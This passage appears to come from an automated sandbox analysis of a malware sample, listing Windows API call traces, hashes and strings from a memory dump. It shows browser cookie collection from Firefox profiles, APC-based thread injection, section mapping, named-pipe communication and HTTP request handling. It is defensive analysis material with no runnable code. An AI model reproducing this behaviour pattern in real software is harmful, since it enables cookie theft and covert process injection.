    • Part of subcall function 001CD890: LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
  • CloseHandle.KERNEL32(001EB094), ref: 001C13F5
  • HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001C5377
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
    • Part of subcall function 001C4202: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C4220
    • Part of subcall function 001C4202: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C4256
    • Part of subcall function 001C4202: HeapFree.KERNEL32(00000000,?), ref: 001C428F
    • Part of subcall function 001C4202: RegCloseKey.ADVAPI32(?), ref: 001C4298
  • WaitForMultipleObjects.KERNEL32(001EA06D,?,00000000,000000FF), ref: 001C541F
    • Part of subcall function 001C5147: WaitForSingleObject.KERNEL32(?,00000000), ref: 001C5153
    • Part of subcall function 001C5147: HeapFree.KERNEL32(00000000,?,?), ref: 001C5181
    • Part of subcall function 001C5147: ResetEvent.KERNEL32(?,?), ref: 001C519B
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5490
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800,001E53C8), ref: 001DDB9C
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32(?,00000000,00000001,001E53C8,00000002,?,?), ref: 001DDBB2
    • Part of subcall function 001DDB79: QueryPerformanceFrequency.KERNEL32(?), ref: 001DDC07
    • Part of subcall function 001DDB79: QueryPerformanceCounter.KERNEL32(?), ref: 001DDC11
    • Part of subcall function 001DDB79: _aulldiv.NTDLL(?,?,?,?), ref: 001DDC23
    • Part of subcall function 001DDB79: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDCEB
    • Part of subcall function 001DDB79: GetTickCount.KERNEL32 ref: 001DDCFC
    • Part of subcall function 001DDB79: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DDD10
    • Part of subcall function 001DDB79: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DDD2E
    • Part of subcall function 001DDB79: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DDD60
    • Part of subcall function 001DDB79: lstrcpy.KERNEL32(?,001ED78A), ref: 001DDD85
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,?), ref: 001DDE1F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DDE2E
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,?,00000000), ref: 001DDE3F
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,001ED78A), ref: 001DDE50
    • Part of subcall function 001DDB79: HeapFree.KERNEL32(00000000,00000000), ref: 001DDE5F
  • _allmul.NTDLL(001EAAEC,00000000,FF676980,000000FF), ref: 001C5535
    • Part of subcall function 001C3F95: RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
    • Part of subcall function 001C3F95: lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
    • Part of subcall function 001C3F95: HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C54ED
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C5565
  • ReleaseMutex.KERNEL32(?), ref: 001C5582
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C55D6
  • SwitchToThread.KERNEL32 ref: 001C55F2
  • ReleaseMutex.KERNEL32(?), ref: 001C55FC
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C36C4
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00010000,001EC206), ref: 001C36E2
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000011A), ref: 001C3713
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,001E53C8,0000011B), ref: 001C3788
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C3800
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C3815
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3820
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C383A
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,001EC206), ref: 001C38C8
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C38DC
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C38E7
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3901
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?,001EC206), ref: 001C3923
    • Part of subcall function 001C3684: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C393E
    • Part of subcall function 001C3684: wsprintfA.USER32 ref: 001C394E
    • Part of subcall function 001C3684: lstrlen.KERNEL32(00000000,00000000), ref: 001C3959
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C3973
    • Part of subcall function 001C3684: HeapFree.KERNEL32(00000000,?), ref: 001C3988
  • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 001C5668
  • SwitchToThread.KERNEL32 ref: 001C5684
  • ReleaseMutex.KERNEL32(?), ref: 001C568E
    • Part of subcall function 001C5111: WaitForSingleObject.KERNEL32(00002710,00000120), ref: 001C512C
  • WaitForSingleObject.KERNEL32(?,00000000), ref: 001C569E
